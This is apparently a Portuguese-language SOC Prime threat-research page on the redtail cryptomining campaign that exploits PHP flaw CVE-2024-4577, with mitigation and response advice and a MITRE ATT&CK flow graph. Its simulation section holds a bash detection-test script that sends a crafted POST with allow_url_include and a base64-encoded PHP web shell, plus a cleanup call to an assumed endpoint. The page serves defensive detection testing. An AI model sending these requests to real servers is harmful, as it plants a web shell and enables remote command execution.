SOC Prime Bias: Crítico

30 Abr 2026 17:12
newspaper icon SANS Internet Storm Center

Libredtail Explora CVE-2024-4577 para Mineração de Criptomoeda

Author Photo
Ruslan Mikhalov Chefe de Pesquisa de Ameaças na SOC Prime linkedin icon Seguir
Libredtail Explora CVE-2024-4577 para Mineração de Criptomoeda
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

O artigo detalha uma campanha de criptomineração envolvendo a família de malware redtail, que é entregue através de requisições HTTP que exploram CVE-2024-4577 em PHP. Os atores de ameaça enviam cargas úteis codificadas em Base64 que recuperam e executam um script autorreplicante chamado cve_2024_4577.selfrep. A atividade é direcionada a servidores web vulneráveis e é acompanhada de tentativas de login SSH que usam credenciais padrão para expandir o acesso.

Investigação

O pesquisador observou vários endereços IP da Alemanha, do Reino Unido e da Índia enviando uma sequência de quatro requisições POST HTTP projetadas para acessar /bin/sh, usar wget or curl para baixar um script shell, e acionar o CVE-2024-4577 exploit. Quando bem-sucedido, o ataque solta um .redtail binário e termina serviços concorrentes de criptomineração já em execução no host. A investigação também registrou tentativas de login SSH usando credenciais como admin/admin, junto com atividade de varredura SYN.

Mitigação

As organizações devem atualizar instalações PHP para versões que abordem CVE-2024-4577, bloquear o user agent libredtail-http no perímetro, e implantar regras WAF que neguem requisições contendo /sh ou o padrão de carga útil de exploração conhecido. O acesso SSH deve ser reforçado aplicando autenticação baseada em chave e desabilitando credenciais padrão ou fracas. Também é recomendada a monitoração de tráfego de saída suspeito para endereços IP desconhecidos.

Resposta

Quando detecções são acionadas, os defensores devem isolar o sistema afetado, coletar artefatos forenses como o cve_2024_4577.selfrep script e o .redtail binário, e remover quaisquer crons ou tarefas agendadas criadas pelo malware. As equipes de segurança devem, então, inventariar aplicativos PHP em todo o ambiente e aplicar os patches necessários. Os logs SSH também devem ser revisados para sinais de abuso de credenciais ou acesso não autorizado.

"graph TB %% Class definitions classDef technique fill:#99ccff %% Nodes u2013 MITRE ATT&CK Techniques tech_exploit_app["<b>Technique</b> – <b>T1190 Exploit Public-Facing Application</b><br/><b>Description</b>: Adversaries may exploit a publicu2011facing application to gain initial access."] class tech_exploit_app technique tech_content_injection["<b>Technique</b> – <b>T1659 Content Injection</b><br/><b>Description</b>: Adversary injects malicious content such as a PHP payload into a web application to achieve code execution."] class tech_content_injection technique tech_deobfuscate["<b>Technique</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/><b>Description</b>: Adversaries decode or deobfuscate data (e.g., Base64) to reveal commands or payloads."] class tech_deobfuscate technique tech_unix_shell["<b>Technique</b> – <b>T1059.004 Unix Shell</b><br/><b>Description</b>: Adversaries use a Unix shell to execute commands such as wget, curl, or sh for downloading and running malicious code."] class tech_unix_shell technique tech_hidden_file["<b>Technique</b> – <b>T1564.001 Hidden Files and Directories</b><br/><b>Description</b>: Adversaries create hidden files or directories (e.g., .redtail) to conceal malicious artifacts."] class tech_hidden_file technique tech_compute_hijack["<b>Technique</b> – <b>T1496.001 Compute Hijacking</b><br/><b>Description</b>: Adversaries hijack system compute resources to perform unauthorized cryptomining."] class tech_compute_hijack technique tech_brute_force["<b>Technique</b> – <b>T1110.001 Password Guessing</b><br/><b>Description</b>: Adversaries attempt credential guessing (e.g., SSH admin/admin) to obtain valid credentials."] class tech_brute_force technique tech_network_discovery["<b>Technique</b> – <b>T1046 Network Service Discovery</b><br/><b>Description</b>: Adversaries perform scans (e.g., SYN scans) to discover active network services and open ports."] class tech_network_discovery technique tech_obfuscate["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Adversaries encode or otherwise obfuscate files (e.g., Base64 encoded POST body) to evade detection."] class tech_obfuscate technique %% Connections showing attack flow tech_exploit_app –>|leads_to| tech_content_injection tech_content_injection –>|leads_to| tech_deobfuscate tech_deobfuscate –>|leads_to| tech_unix_shell tech_unix_shell –>|leads_to| tech_hidden_file tech_hidden_file –>|leads_to| tech_compute_hijack tech_exploit_app –>|also_triggers| tech_brute_force tech_brute_force –>|leads_to| tech_network_discovery tech_unix_shell –>|enables| tech_obfuscate "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary has obtained a foothold on a compromised web server and wishes to establish persistence using the Libredtail‑HTTP web‑shell. They craft a malicious HTTP POST that:

    1. Uses the distinctive libredtail‑http user‑agent (helps the malware identify its own traffic).
    2. Includes a URL query with /bin/sh to indicate a command‑execution request and the PHP directive allow_url_include=1 to permit remote code inclusion.
    3. Sends a base64‑encoded payload in the request body that contains the PHP code <?php system($_GET['cmd']); ?> (obfuscation – T1027).
    4. Sets a custom header Script-Execution: apache.selfrep which Libredtail‑HTTP uses internally for self‑replication (matches script_execution|contains).

    The server, when processing this request, decodes the payload, writes a malicious PHP file to the webroot, and later executes commands received via /bin/sh, establishing an encrypted channel back to the attacker (T1573).

  • Regression Test Script:

    #!/usr/bin/env bash
# -------------------------------------------------
# Libredtail-HTTP malicious request simulation
# -------------------------------------------------
TARGET="http://localhost/upload.php"
USER_AGENT="libredtail-http"
MALICIOUS_PAYLOAD=$(echo -n '<?php system($_GET["cmd"]); ?>' | base64)

curl -X POST "$TARGET?dir=/bin/sh&allow_url_include=1" 
     -H "User-Agent: $USER_AGENT" 
     -H "Script-Execution: apache.selfrep" 
     -H "Content-Type: application/x-www-form-urlencoded" 
     --data "payload=$MALICIOUS_PAYLOAD&marker=cve_2024_4577.selfrep"
# The request should create/overwrite a PHP web‑shell on the server.

    Run the script on a machine that can reach the target web server. After execution, verify the alert fires in the SIEM.

  • Cleanup Commands:

    #!/usr/bin/env bash
# Remove the malicious PHP web‑shell created by the test
CLEANUP_TARGET="http://localhost/cleanup.php"

curl -X POST "$CLEANUP_TARGET" 
     -H "User-Agent: libredtail-http" 
     -d "file=uploaded_shell.php"

    The cleanup endpoint is assumed to exist for test purposes; replace with appropriate file‑system removal commands if you have direct host access.

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente